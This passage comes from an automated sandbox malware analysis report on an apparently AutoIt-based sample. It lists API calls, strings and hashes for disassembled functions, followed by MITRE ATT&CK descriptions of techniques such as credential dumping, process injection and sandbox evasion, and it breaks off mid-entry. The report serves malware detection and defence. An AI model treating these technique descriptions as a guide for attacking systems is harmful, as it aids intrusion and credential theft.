Part of subcall function 0081600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0081604C
Part of subcall function 0081600E: GetStockObject.GDI32(00000011), ref: 00816060
Part of subcall function 0081600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081606A

GetWindowRect.USER32(00000000,?), ref: 008A377A
GetSysColor.USER32(00000012), ref: 008A3794

Strings

static, xrefs: 008A3757

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: f2e86444e8a81d2b79acb4de1d783748215f0754e8829ed52baa4a9a5885c213
Instruction ID: 0e14cf02875783ca7e5c1eeee1e3f7a9077e1ff5f16a2163c447d1649ce35172
Opcode Fuzzy Hash: f2e86444e8a81d2b79acb4de1d783748215f0754e8829ed52baa4a9a5885c213
Instruction Fuzzy Hash: 0811F9B2610209AFEF01DFA8CC45EFA7BB8FB09354F004525F955E2250E775E9519B60

Function 0088CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0088CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0088CDA6

Strings

<local>, xrefs: 0088CD66

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: a99e7740e1c2e68787fcc6e86141af69f5ba67435f6903dffe216a9401de8810
Instruction ID: 04ba3b047b8d678203356d3ae68de9d5b3562bfaa62c10c5c620c539fb01e870
Opcode Fuzzy Hash: a99e7740e1c2e68787fcc6e86141af69f5ba67435f6903dffe216a9401de8810
Instruction Fuzzy Hash: 8C11A371205636BAD7746B668C45EE7BEA8FB127A4F004226B109C3184D6749841D7F0

Function 008A3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 008A34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008A34BA

Strings

edit, xrefs: 008A348F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 22a6e565d55c22cd88fce54aa9b97c8bb93bbcfdb687999a9d6965398f8b51ed
Instruction ID: f3b2856bd3e267dbafb9a2bc4cb5c9b123dc9b31c8922b1164eef5c656518fc2
Opcode Fuzzy Hash: 22a6e565d55c22cd88fce54aa9b97c8bb93bbcfdb687999a9d6965398f8b51ed
Instruction Fuzzy Hash: 1E116D71501208ABFB118E64DC44AAB3B6AFB2A378F504324F961D79D0C771DD919B68

Function 00876C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

CharUpperBuffW.USER32(?,?,?), ref: 00876CB6
_wcslen.LIBCMT ref: 00876CC2

Strings

STOP, xrefs: 00876CBC, 00876CC1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 564d0aa517d9c4eaa80a8f52b878bb8f3dfead59a32e595c7e699f22af357f48
Instruction ID: b41f7b547dbe74b910470fc6992e6f5e886f0907743b8c119f75df931a58b85e
Opcode Fuzzy Hash: 564d0aa517d9c4eaa80a8f52b878bb8f3dfead59a32e595c7e699f22af357f48
Instruction Fuzzy Hash: 7C010432A109268ACB219FBDCC809BF37A8FFA1710B104528E966D6198FB32D960C650

Function 00871CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Part of subcall function 00873CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00873CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00871D4C

Strings

ListBox, xrefs: 00871D16
ComboBox, xrefs: 00871CEB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9cb6959ad22d941a0b265045d300158e11649e221f61c59166e37070d8eb3cb5
Instruction ID: e531934f340717fc4f21d8d8b70de52a75fa001daac7a6b7489ac931e99446ca
Opcode Fuzzy Hash: 9cb6959ad22d941a0b265045d300158e11649e221f61c59166e37070d8eb3cb5
Instruction Fuzzy Hash: 2E012D316001186BCF14EBACCC55CFE7768FF43390B00461AF876D73C5EA3099089A61

Function 00871BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Part of subcall function 00873CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00873CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00871C46

Strings

ListBox, xrefs: 00871C10
ComboBox, xrefs: 00871BE5

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 7efc58a12b211cfa41bafca1558a9d03ce6683cd5b47b63ef3369044df201921
Instruction ID: 97efb2f01797dae4c7a5ee1a49cef128f5b836c715748fe7fe9445c844588d8b
Opcode Fuzzy Hash: 7efc58a12b211cfa41bafca1558a9d03ce6683cd5b47b63ef3369044df201921
Instruction Fuzzy Hash: A701D87168010866CF05E7D8C9569FF73ACFF51340F20001AE85AE7685EA20DB0896B2

Function 00871C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Part of subcall function 00873CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00873CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00871CC8

Strings

ListBox, xrefs: 00871C94
ComboBox, xrefs: 00871C69

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: d71eedffd2cfe0dd5ba4ba3e14581d07b32f5155ac5b2a259bd3b59ae199e7c7
Instruction ID: f9d184419b2ce5dc4f2ef4ca7f824033314464e91e528798622f664b9f6cb4ac
Opcode Fuzzy Hash: d71eedffd2cfe0dd5ba4ba3e14581d07b32f5155ac5b2a259bd3b59ae199e7c7
Instruction Fuzzy Hash: BF01A77168011866DF15EBD8CA16AFE73ACFF51340B144016B886F3685EA20DF0896B2

Function 0089747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00897493
_wcslen.LIBCMT ref: 008974B9

Strings

3, 3, 16, 1, xrefs: 00897483

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: df59a66127e7b75d86255d5a14dc38a940b4f97438c8431816359d7ee2eac021
Instruction ID: b0c9570cc18cc8bc6e0a15935c1d22ab9417d6bbdfd743e821ef7492abd84201
Opcode Fuzzy Hash: df59a66127e7b75d86255d5a14dc38a940b4f97438c8431816359d7ee2eac021
Instruction Fuzzy Hash: F9E02B02224220109731327DDCC1B7F5B89FFC9760B18282BFD85C2377EA989D9193E6

Function 00870B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00870B23

Strings

AutoIt, xrefs: 00870B17
Error allocating memory., xrefs: 00870B1C

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: a437e4f7221fbc233b154cfb9cbb3095e25c90f72ffd17fef2ea422d2870c4ef
Instruction ID: f003c798c29efb58c17c4ba14deffd7daae0921fd8f06882e0de7f2b10ad85f7
Opcode Fuzzy Hash: a437e4f7221fbc233b154cfb9cbb3095e25c90f72ffd17fef2ea422d2870c4ef
Instruction Fuzzy Hash: FCE0D83124431836E21037987C03F897B84FF06B60F100427FB98D5AC38FE1649046EA

Function 00830D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0082F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00830D71,?,?,?,0081100A), ref: 0082F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0081100A), ref: 00830D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0081100A), ref: 00830D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00830D7F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 8190aac6d4c11a093638a9498259bc1541b4818d842ea91f4d7eb9de85701a3e
Instruction ID: c2c17584899b51a69c9f51e3184ddb519db6c7a06f50f157ff63199430157ddf
Opcode Fuzzy Hash: 8190aac6d4c11a093638a9498259bc1541b4818d842ea91f4d7eb9de85701a3e
Instruction Fuzzy Hash: 57E06D702007518BE3209FFCE8583467BE4FF05740F004A2DE582CAA52DBB4E4888FD1

Function 00883017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0088302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00883044

Strings

aut, xrefs: 00883038

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: a952069d7203b2fc5545cb149153b4abcbc31a347afea88ba88cad3c8140f0c1
Instruction ID: f138cb5a82abec90377433de8f33b86f40ed7874e53840673b3f74f947d3e15f
Opcode Fuzzy Hash: a952069d7203b2fc5545cb149153b4abcbc31a347afea88ba88cad3c8140f0c1
Instruction Fuzzy Hash: 21D05B7150032867DA209794AD0DFC73B6CE705750F0002527655D2191DAB49544CAD0

Function 0086D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0086D220

Strings

X64, xrefs: 0086D2A8
%.3d, xrefs: 0086D22B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: c2e8ae44ad7932f4c2359f2d58d83c29fc0771bb3bf49f0e7fbace9d9b2811d0
Instruction ID: 5de2fe68ec3711abb88604ae65c2ef43707bd995798b97fb8d0b07f9e017f95c
Opcode Fuzzy Hash: c2e8ae44ad7932f4c2359f2d58d83c29fc0771bb3bf49f0e7fbace9d9b2811d0
Instruction Fuzzy Hash: 59D05BB1D0831CE9CB9097D0DC559B9B37CFB08305F918463F906D1241E738E548A761

Function 008A2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008A232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008A233F

Part of subcall function 0087E97B: Sleep.KERNEL32 ref: 0087E9F3

Strings

Shell_TrayWnd, xrefs: 008A2325

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f5487fce4cea312ee9a729e91246d7a89b117aeae2203d3b98b4d194167e5686
Instruction ID: 49ac0c524c9ecfa5996180fa75af021079cc36840f2b1e3d72b1fe6b69be35fc
Opcode Fuzzy Hash: f5487fce4cea312ee9a729e91246d7a89b117aeae2203d3b98b4d194167e5686
Instruction Fuzzy Hash: ACD01236794314B7F6A4BB70DC4FFCA7A14FB15B10F008A167759EA2D4D9F4A801CA54

Function 008A2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008A236C
PostMessageW.USER32(00000000), ref: 008A2373

Part of subcall function 0087E97B: Sleep.KERNEL32 ref: 0087E9F3

Strings

Shell_TrayWnd, xrefs: 008A2365

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 3d581e3807a6fef973aa98eabfe49f13599ecd58d07a38c9ce50a8a41b6fa038
Instruction ID: eccca48c20e6be6db2eceb6058761953ab3a2f23f69dda266fa4498532d1c7ee
Opcode Fuzzy Hash: 3d581e3807a6fef973aa98eabfe49f13599ecd58d07a38c9ce50a8a41b6fa038
Instruction Fuzzy Hash: 6FD0C9327813147AF6A4AB709C4FFCA6A14BB16B10F008A167755EA2D4D9A4A8018A54

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
